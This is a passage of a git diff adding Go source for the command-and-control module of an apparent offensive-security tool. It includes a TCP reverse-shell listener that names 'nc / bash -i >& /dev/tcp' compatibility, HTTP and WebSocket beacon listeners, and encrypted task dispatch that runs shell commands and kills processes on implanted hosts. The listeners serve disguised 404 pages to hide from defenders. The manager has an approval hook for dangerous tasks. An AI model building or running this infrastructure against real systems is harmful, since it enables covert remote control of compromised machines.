r.Header.Get("Content-Type") + accept := r.Header.Get("Accept") + return strings.Contains(ct, "application/json") || + strings.Contains(accept, "application/json") || + strings.Contains(r.UserAgent(), "curl/") +} + +// ApplyJitter 给定基础 sleep + jitter 百分比,返回随机抖动后的 duration +// 公开给 listener_websocket / payload 模板共用,避免重复实现 +func ApplyJitter(baseSec, jitterPercent int) time.Duration { + if baseSec <= 0 { + return 0 + } + if jitterPercent <= 0 { + return time.Duration(baseSec) * time.Second + } + if jitterPercent > 100 { + jitterPercent = 100 + } + delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j] + factor := 1.0 + float64(delta)/100.0 + return time.Duration(float64(baseSec)*factor) * time.Second +} diff --git a/internal/c2/listener_http_test.go b/internal/c2/listener_http_test.go new file mode 100644 index 00000000..f7109233 --- /dev/null +++ b/internal/c2/listener_http_test.go @@ -0,0 +1,129 @@ +package c2 + +import ( + "bytes" + "encoding/json" + "io" + "net" + "net/http" + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// 集成验证:路由、鉴权伪装 404、明文 check-in JSON 回包。 +func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) { + tmp := t.TempDir() + dbPath := filepath.Join(tmp, "c2.sqlite") + db, err := database.NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + + lnPick, err := net.Listen("tcp", "127.0.0.1:0") + if err != nil { + t.Fatal(err) + } + port := lnPick.Addr().(*net.TCPAddr).Port + _ = lnPick.Close() + + keyB64, err := GenerateAESKey() + if err != nil { + t.Fatal(err) + } + token := "test-implant-token-fixed" + + lid := "l_testhttpbeacon01" + rec := &database.C2Listener{ + ID: lid, + Name: "t", + Type: string(ListenerTypeHTTPBeacon), + BindHost: "127.0.0.1", + BindPort: port, + EncryptionKey: keyB64, + ImplantToken: token, + Status: "stopped", + ConfigJSON: `{"beacon_check_in_path":"/check_in"}`, + CreatedAt: time.Now(), + } + if err := db.CreateC2Listener(rec); err != nil { + t.Fatal(err) + } + + m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store")) + m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener) + if _, err := m.StartListener(lid); err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = m.StopListener(lid) }) + + base := "http://127.0.0.1:" + strconv.Itoa(port) + client := &http.Client{Timeout: 5 * time.Second} + + t.Run("wrong_path_go_default_404", func(t *testing.T) { + resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`)) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusNotFound { + t.Fatalf("status=%d body=%q", resp.StatusCode, b) + } + if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") { + t.Fatalf("unexpected body: %q", b) + } + }) + + t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) { + req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`)) + req.Header.Set("X-Implant-Token", "wrong-token") + req.Header.Set("Content-Type", "application/json") + resp, err := client.Do(req) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusNotFound { + t.Fatalf("status=%d", resp.StatusCode) + } + ct := resp.Header.Get("Content-Type") + if !strings.Contains(ct, "text/html") { + t.Fatalf("content-type=%q body=%q", ct, b) + } + if !strings.Contains(string(b), "404 Not Found") { + t.Fatalf("expected disguised HTML, got: %q", b) + } + }) + + t.Run("check_in_ok_plaintext_json", func(t *testing.T) { + body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}` + req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body)) + req.Header.Set("X-Implant-Token", token) + req.Header.Set("Content-Type", "application/json") + resp, err := client.Do(req) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusOK { + t.Fatalf("status=%d body=%s", resp.StatusCode, b) + } + var out ImplantCheckInResponse + if err := json.Unmarshal(b, &out); err != nil { + t.Fatalf("json: %v body=%s", err, b) + } + if out.SessionID == "" || out.NextSleep <= 0 { + t.Fatalf("bad response: %+v", out) + } + }) +} diff --git a/internal/c2/listener_tcp.go b/internal/c2/listener_tcp.go new file mode 100644 index 00000000..14ff9f35 --- /dev/null +++ b/internal/c2/listener_tcp.go @@ -0,0 +1,439 @@ +package c2 + +import ( + "bufio" + "context" + "crypto/sha256" + "encoding/hex" + "fmt" + "io" + "net" + "regexp" + "strings" + "sync" + "sync/atomic" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。 +// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。 +// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。 +// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session; +// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。 +type TCPReverseListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + + mu sync.Mutex + listener net.Listener + stopCh chan struct{} + conns map[string]*tcpReverseConn // session_id → 连接 + stopOnce sync.Once +} + +// tcpReverseConn 单个反弹会话的运行时状态 +type tcpReverseConn struct { + sessionID string + conn net.Conn + reader *bufio.Reader + writeMu sync.Mutex // 序列化 write,避免并发 task 写入 + taskMode int32 // 原子标志: 0=空闲(handleConn读), 1=任务中(runTaskOnConn独占读) +} + +// NewTCPReverseListener 工厂方法(注册到 ListenerRegistry["tcp_reverse"]) +func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) { + return &TCPReverseListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + stopCh: make(chan struct{}), + conns: make(map[string]*tcpReverseConn), + }, nil +} + +// Type 返回类型常量 +func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) } + +// Start 启动 TCP 监听,accept 在独立 goroutine 中运行 +func (l *TCPReverseListener) Start() error { + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + l.mu.Lock() + l.listener = ln + l.mu.Unlock() + go l.acceptLoop() + go l.taskDispatcherLoop() + return nil +} + +// Stop 关闭监听 + 所有活动连接 +func (l *TCPReverseListener) Stop() error { + l.stopOnce.Do(func() { + close(l.stopCh) + }) + l.mu.Lock() + if l.listener != nil { + _ = l.listener.Close() + l.listener = nil + } + for sid, c := range l.conns { + _ = c.conn.Close() + delete(l.conns, sid) + } + l.mu.Unlock() + return nil +} + +func (l *TCPReverseListener) acceptLoop() { + for { + l.mu.Lock() + ln := l.listener + l.mu.Unlock() + if ln == nil { + return + } + conn, err := ln.Accept() + if err != nil { + select { + case <-l.stopCh: + return + default: + } + if isClosedConnErr(err) { + return + } + l.logger.Warn("tcp_reverse accept 失败", zap.Error(err)) + continue + } + go l.handleConn(conn) + } +} + +// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。 +func (l *TCPReverseListener) handleConn(conn net.Conn) { + br := bufio.NewReader(conn) + _ = conn.SetReadDeadline(time.Now().Add(20 * time.Second)) + prefix, err := br.Peek(4) + if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic { + if _, err := br.Discard(4); err != nil { + _ = conn.Close() + return + } + _ = conn.SetReadDeadline(time.Time{}) + l.handleTCPBeaconSession(conn, br) + return + } + _ = conn.SetReadDeadline(time.Time{}) + l.handleShellConn(conn, br) +} + +// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。 +func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) { + remote := conn.RemoteAddr().String() + host, _, _ := net.SplitHostPort(remote) + // 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话 + uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host) + hash := sha256.Sum256([]byte(uuidSeed)) + implantUUID := hex.EncodeToString(hash[:8]) + + checkin := ImplantCheckInRequest{ + ImplantUUID: implantUUID, + Hostname: "tcp_" + host, + Username: "unknown", + OS: "unknown", + Arch: "unknown", + InternalIP: host, + SleepSeconds: 0, // 交互式不需要 sleep + JitterPercent: 0, + Metadata: map[string]interface{}{ + "transport": "tcp_reverse", + "remote": remote, + }, + } + session, err := l.manager.IngestCheckIn(l.rec.ID, checkin) + if err != nil { + l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err)) + _ = conn.Close() + return + } + + tc := &tcpReverseConn{ + sessionID: session.ID, + conn: conn, + reader: br, + } + l.mu.Lock() + if old, exists := l.conns[session.ID]; exists { + _ = old.conn.Close() + } + l.conns[session.ID] = tc + l.mu.Unlock() + + defer func() { + l.mu.Lock() + if cur, ok := l.conns[session.ID]; ok && cur == tc { + delete(l.conns, session.ID) + _ = l.manager.MarkSessionDead(session.ID) + } + l.mu.Unlock() + _ = conn.Close() + }() + + // 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出 + // 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂 + buf := make([]byte, 4096) + for { + select { + case <-l.stopCh: + return + default: + } + // 任务执行中,runTaskOnConn 独占读取权,主循环暂停 + if atomic.LoadInt32(&tc.taskMode) == 1 { + time.Sleep(100 * time.Millisecond) + continue + } + _ = conn.SetReadDeadline(time.Now().Add(60 * time.Second)) + n, err := tc.reader.Read(buf) + if n > 0 { + // 收到数据也刷新心跳 + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + if atomic.LoadInt32(&tc.taskMode) == 0 { + l.manager.publishEvent("info", "task", session.ID, "", + "stdout(unsolicited)", map[string]interface{}{ + "output": string(buf[:n]), + }) + } + } + if err != nil { + if err == io.EOF || isClosedConnErr(err) { + return + } + if ne, ok := err.(net.Error); ok && ne.Timeout() { + // 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判 + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + continue + } + return + } + } +} + +// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令 +func (l *TCPReverseListener) taskDispatcherLoop() { + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + for { + select { + case <-l.stopCh: + return + case <-t.C: + l.mu.Lock() + snapshot := make([]*tcpReverseConn, 0, len(l.conns)) + for _, c := range l.conns { + snapshot = append(snapshot, c) + } + l.mu.Unlock() + for _, c := range snapshot { + envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5) + if err != nil || len(envelopes) == 0 { + continue + } + for _, env := range envelopes { + go l.runTaskOnConn(c, env) + } + } + } + } +} + +// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出 +func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) { + startedAt := NowUnixMillis() + cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload) + if !ok { + l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "") + return + } + + // 独占读取权:通知 handleConn 主循环暂停 + atomic.StoreInt32(&c.taskMode, 1) + defer atomic.StoreInt32(&c.taskMode, 0) + + // 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成) + time.Sleep(150 * time.Millisecond) + + // 排空 buffer 中残留的 bash 提示符等数据 + drainStaleData(c.reader, c.conn) + + endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID) + wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark) + c.writeMu.Lock() + _ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second)) + if _, err := c.conn.Write([]byte(wrapped)); err != nil { + c.writeMu.Unlock() + l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "") + return + } + c.writeMu.Unlock() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + output, err := readUntilMarker(ctx, c.reader, endMark) + if err != nil { + l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "") + return + } + cleaned := cleanShellOutput(output, cmd) + l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "") +} + +// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径 +func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) { + _ = l.manager.IngestTaskResult(TaskResultReport{ + TaskID: taskID, + Success: success, + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: startedAtMS, + EndedAt: NowUnixMillis(), + }) +} + +// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。 +// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些 +// 需要二进制传输的能力建议使用 http_beacon。 +func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) { + switch t { + case TaskTypeExec, TaskTypeShell: + cmd, _ := payload["command"].(string) + return cmd, true + case TaskTypePwd: + return "pwd 2>/dev/null || cd", true + case TaskTypeLs: + path, _ := payload["path"].(string) + if strings.TrimSpace(path) == "" { + path = "." + } + return "ls -la " + shellQuote(path), true + case TaskTypePs: + return "ps -ef 2>/dev/null || ps aux", true + case TaskTypeKillProc: + pid, _ := payload["pid"].(float64) + if pid <= 0 { + return "", false + } + return fmt.Sprintf("kill -9 %d", int(pid)), true + case TaskTypeCd: + path, _ := payload["path"].(string) + if strings.TrimSpace(path) == "" { + return "", false + } + return "cd " + shellQuote(path) + " && pwd", true + case TaskTypeExit: + return "exit 0", true + } + return "", false +} + +// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出 +func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) { + var sb strings.Builder + buf := make([]byte, 4096) + deadline := time.Now().Add(60 * time.Second) + for { + select { + case <-ctx.Done(): + return sb.String(), ctx.Err() + default: + } + if time.Now().After(deadline) { + return sb.String(), fmt.Errorf("timeout") + } + n, err := r.Read(buf) + if n > 0 { + sb.Write(buf[:n]) + if idx := strings.Index(sb.String(), marker); idx >= 0 { + return strings.TrimRight(sb.String()[:idx], "\r\n"), nil + } + } + if err != nil { + return sb.String(), err + } + } +} + +func shellQuote(s string) string { + return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'" +} + +func isAddrInUse(err error) bool { + if err == nil { + return false + } + return strings.Contains(strings.ToLower(err.Error()), "address already in use") || + strings.Contains(strings.ToLower(err.Error()), "bind: only one usage") +} + +func isClosedConnErr(err error) bool { + if err == nil { + return false + } + es := err.Error() + return strings.Contains(es, "use of closed network connection") || + strings.Contains(es, "connection reset by peer") +} + +// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据 +func drainStaleData(r *bufio.Reader, conn net.Conn) { + buf := make([]byte, 4096) + for { + _ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond)) + n, err := r.Read(buf) + if n == 0 || err != nil { + break + } + } + // 恢复较长的读超时 + _ = conn.SetReadDeadline(time.Time{}) +} + +var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`) + +// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出 +func cleanShellOutput(raw, cmd string) string { + lines := strings.Split(raw, "\n") + var cleaned []string + cmdTrimmed := strings.TrimSpace(cmd) + echoSkipped := false + for _, line := range lines { + trimmed := strings.TrimRight(line, "\r \t") + // 跳过命令回显行(bash 会 echo 回输入的命令) + if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) { + echoSkipped = true + continue + } + // 跳过纯 shell 提示符行 + if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 { + continue + } + cleaned = append(cleaned, line) + } + result := strings.Join(cleaned, "\n") + return strings.TrimSpace(result) +} diff --git a/internal/c2/listener_websocket.go b/internal/c2/listener_websocket.go new file mode 100644 index 00000000..da7f85db --- /dev/null +++ b/internal/c2/listener_websocket.go @@ -0,0 +1,297 @@ +package c2 + +import ( + "context" + "crypto/subtle" + "encoding/json" + "errors" + "fmt" + "net" + "net/http" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/gorilla/websocket" + "go.uber.org/zap" +) + +// WebSocketListener 提供低延迟的双向 WebSocket Beacon。 +// 与 HTTP Beacon 相比: +// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到"; +// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出); +// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token; +// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。 +// +// 帧协议(皆为加密后 base64 字符串走 TextMessage): +// client → server:{"type":"checkin"|"result", "data": } +// server → client:{"type":"task", "data": } 或 {"type":"sleep","data":{"sleep":N,"jitter":J}} +type WebSocketListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + + srv *http.Server + upgrader websocket.Upgrader + + mu sync.Mutex + conns map[string]*wsConn // session_id → 连接 + stopped bool + stopCh chan struct{} +} + +// wsConn 单个 WS implant 的内存状态 +type wsConn struct { + sessionID string + ws *websocket.Conn + writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer +} + +// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"]) +func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) { + return &WebSocketListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + stopCh: make(chan struct{}), + conns: make(map[string]*wsConn), + upgrader: websocket.Upgrader{ + ReadBufferSize: 4096, + WriteBufferSize: 4096, + // 允许任意 Origin(implant 不带 Origin 或随便填) + CheckOrigin: func(r *http.Request) bool { return true }, + }, + }, nil +} + +// Type 类型 +func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) } + +// Start 启动 HTTP server 接收 WS 升级 +func (l *WebSocketListener) Start() error { + mux := http.NewServeMux() + wsPath := l.cfg.BeaconCheckInPath + if wsPath == "" || wsPath == "/check_in" { + // websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆 + wsPath = "/ws" + } + mux.HandleFunc(wsPath, l.handleWS) + + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + l.srv = &http.Server{ + Addr: addr, + Handler: mux, + ReadHeaderTimeout: 15 * time.Second, + } + go func() { + if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("websocket Serve exited", zap.Error(err)) + } + }() + go l.taskDispatcherLoop() + return nil +} + +// Stop 优雅关闭:通知所有 WS 客户端,关闭 server +func (l *WebSocketListener) Stop() error { + l.mu.Lock() + if l.stopped { + l.mu.Unlock() + return nil + } + l.stopped = true + close(l.stopCh) + conns := make([]*wsConn, 0, len(l.conns)) + for _, c := range l.conns { + conns = append(conns, c) + } + l.conns = make(map[string]*wsConn) + l.mu.Unlock() + for _, c := range conns { + _ = c.ws.WriteControl(websocket.CloseMessage, + websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"), + time.Now().Add(time.Second)) + _ = c.ws.Close() + } + if l.srv != nil { + ctx, cancel := contextWithTimeout(5 * time.Second) + defer cancel() + _ = l.srv.Shutdown(ctx) + } + return nil +} + +func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) { + got := r.Header.Get("X-Implant-Token") + if got == "" || l.rec.ImplantToken == "" || + subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 { + http.NotFound(w, r) + return + } + ws, err := l.upgrader.Upgrade(w, r, nil) + if err != nil { + l.logger.Warn("websocket 升级失败", zap.Error(err)) + return + } + go l.handleConn(ws) +} + +// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环 +func (l *WebSocketListener) handleConn(ws *websocket.Conn) { + ws.SetReadLimit(64 << 20) + ws.SetReadDeadline(time.Now().Add(60 * time.Second)) + ws.SetPongHandler(func(string) error { + ws.SetReadDeadline(time.Now().Add(60 * time.Second)) + return nil + }) + + // 第一帧必须是 checkin + frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey) + if err != nil || frameType != "checkin" { + _ = ws.Close() + return + } + var req ImplantCheckInRequest + if err := json.Unmarshal(body, &req); err != nil { + _ = ws.Close() + return + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + _ = ws.Close() + return + } + conn := &wsConn{sessionID: session.ID, ws: ws} + l.mu.Lock() + l.conns[session.ID] = conn + l.mu.Unlock() + defer func() { + l.mu.Lock() + delete(l.conns, session.ID) + l.mu.Unlock() + _ = ws.Close() + _ = l.manager.MarkSessionDead(session.ID) + }() + + // 心跳 goroutine + pingTicker := time.NewTicker(20 * time.Second) + defer pingTicker.Stop() + go func() { + for { + select { + case <-l.stopCh: + return + case <-pingTicker.C: + conn.writeMu.Lock() + _ = ws.WriteControl(websocket.PingMessage, nil, time.Now().Add(5*time.Second)) + conn.writeMu.Unlock() + } + } + }() + + // 主读循环:处理 result 等帧 + for { + frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey) + if err != nil { + return + } + switch frameType { + case "result": + var report TaskResultReport + if err := json.Unmarshal(body, &report); err == nil { + _ = l.manager.IngestTaskResult(report) + } + case "checkin": + // 心跳更新:beacon 周期性送上心跳 + var hb ImplantCheckInRequest + if err := json.Unmarshal(body, &hb); err == nil { + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + } + } + } +} + +// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务 +func (l *WebSocketListener) taskDispatcherLoop() { + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + for { + select { + case <-l.stopCh: + return + case <-t.C: + l.mu.Lock() + snapshot := make([]*wsConn, 0, len(l.conns)) + for _, c := range l.conns { + snapshot = append(snapshot, c) + } + l.mu.Unlock() + for _, c := range snapshot { + envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20) + if err != nil || len(envelopes) == 0 { + continue + } + for _, env := range envelopes { + l.sendTaskFrame(c, env) + } + } + } + } +} + +func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) { + frame := map[string]interface{}{"type": "task", "data": env} + body, err := json.Marshal(frame) + if err != nil { + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + return + } + c.writeMu.Lock() + defer c.writeMu.Unlock() + _ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second)) + _ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc)) +} + +// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data +func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) { + mt, raw, err := ws.ReadMessage() + if err != nil { + return "", nil, err + } + if mt != websocket.TextMessage && mt != websocket.BinaryMessage { + return "", nil, errors.New("unexpected ws frame type") + } + plain, err := DecryptAESGCM(key, string(raw)) + if err != nil { + return "", nil, err + } + var env struct { + Type string `json:"type"` + Data json.RawMessage `json:"data"` + } + if err := json.Unmarshal(plain, &env); err != nil { + return "", nil, err + } + return env.Type, env.Data, nil +} + +// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context +func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) { + return context.WithTimeout(context.Background(), d) +} diff --git a/internal/c2/manager.go b/internal/c2/manager.go new file mode 100644 index 00000000..349e986b --- /dev/null +++ b/internal/c2/manager.go @@ -0,0 +1,777 @@ +package c2 + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "path/filepath" + "regexp" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// Manager 是 C2 模块对外的统一门面: +// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2, +// 不直接接触 listener 实现细节,避免循环依赖; +// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map; +// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。 +// +// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp. +type Manager struct { + db *database.DB + logger *zap.Logger + bus *EventBus + registry *ListenerRegistry + + mu sync.RWMutex + runningListeners map[string]Listener // listener_id → 已 Start 的 listener 实例 + storageDir string // 大结果(截图/下载)落盘根目录 + + hitlBridge HITLBridge // 危险任务在 EnqueueTask 时调它发起审批(nil 表示不接 HITL) + hitlDangerousGate func(conversationID, mcpToolName string) bool // 与人机协同一致:为 nil 或返回 false 时不走桥 + hooks Hooks // 扩展挂钩:会话上线 / 任务完成 时通知漏洞库与攻击链 +} + +// MCPToolC2Task 与 MCP builtin、c2_task 工具名一致,供 HITL 白名单与 Agent 侧对齐。 +const MCPToolC2Task = "c2_task" + +// HITLBridge 把"危险任务"桥到现有 internal/handler/hitl 审批流的接口。 +// internal/app 实例化时传入;空实现表示禁用 HITL 拦截(开发期方便)。 +type HITLBridge interface { + // RequestApproval 阻塞等待人工审批;返回 nil 表示批准,error 表示拒绝/超时。 + // ctx 携带用户/会话信息;危险任务调用时会创建超时 ctx 避免无限挂起。 + RequestApproval(ctx context.Context, req HITLApprovalRequest) error +} + +// HITLApprovalRequest 待审批的 C2 操作描述 +type HITLApprovalRequest struct { + TaskID string + SessionID string + TaskType string + PayloadJSON string + ConversationID string + Source string + Reason string +} + +// Hooks 给上层(漏洞管理 / 攻击链)注入回调 +type Hooks struct { + OnSessionFirstSeen func(session *database.C2Session) // 新会话首次上线 + OnTaskCompleted func(task *database.C2Task, sessionID string) // 任务完成(success/failed) +} + +// NewManager 创建 Manager;不会启动任何 listener,请显式调 RestoreRunningListeners +func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager { + if logger == nil { + logger = zap.NewNop() + } + if storageDir == "" { + storageDir = "tmp/c2" + } + return &Manager{ + db: db, + logger: logger, + bus: NewEventBus(), + registry: NewListenerRegistry(), + runningListeners: make(map[string]Listener), + storageDir: storageDir, + } +} + +// SetHITLBridge 设置危险任务审批桥;nil 表示禁用 +func (m *Manager) SetHITLBridge(b HITLBridge) { + m.mu.Lock() + m.hitlBridge = b + m.mu.Unlock() +} + +// SetHITLDangerousGate 设置 C2 危险任务是否应走 HITL 桥;须与 Agent 人机协同判定一致(例如 handler.HITLManager.NeedsToolApproval)。 +// gate 为 nil 时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。 +func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) { + m.mu.Lock() + m.hitlDangerousGate = gate + m.mu.Unlock() +} + +// SetHooks 注入业务钩子 +func (m *Manager) SetHooks(h Hooks) { + m.mu.Lock() + m.hooks = h + m.mu.Unlock() +} + +// EventBus 暴露事件总线给 SSE handler +func (m *Manager) EventBus() *EventBus { return m.bus } + +// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装) +func (m *Manager) DB() *database.DB { return m.db } + +// Logger 暴露日志句柄 +func (m *Manager) Logger() *zap.Logger { return m.logger } + +// StorageDir 大结果落盘根目录 +func (m *Manager) StorageDir() string { return m.storageDir } + +// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现 +func (m *Manager) Registry() *ListenerRegistry { return m.registry } + +// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线 +func (m *Manager) Close() { + m.mu.Lock() + listeners := make([]Listener, 0, len(m.runningListeners)) + for _, l := range m.runningListeners { + listeners = append(listeners, l) + } + m.runningListeners = make(map[string]Listener) + m.mu.Unlock() + for _, l := range listeners { + _ = l.Stop() + } + m.bus.Close() +} + +// ---------------------------------------------------------------------------- +// Listener 生命周期 +// ---------------------------------------------------------------------------- + +// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim) +type CreateListenerInput struct { + Name string + Type string + BindHost string + BindPort int + ProfileID string + Remark string + Config *ListenerConfig + // CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind) + CallbackHost string +} + +// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动) +func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) { + if strings.TrimSpace(in.Name) == "" { + return nil, ErrInvalidInput + } + if !IsValidListenerType(in.Type) { + return nil, ErrUnsupportedType + } + if err := SafeBindPort(in.BindPort); err != nil { + return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400} + } + bindHost := strings.TrimSpace(in.BindHost) + if bindHost == "" { + bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改 + } + cfg := in.Config + if cfg == nil { + cfg = &ListenerConfig{} + } else { + cp := *cfg + cfg = &cp + } + if ch := strings.TrimSpace(in.CallbackHost); ch != "" { + cfg.CallbackHost = ch + } + cfg.ApplyDefaults() + cfgJSON, err := json.Marshal(cfg) 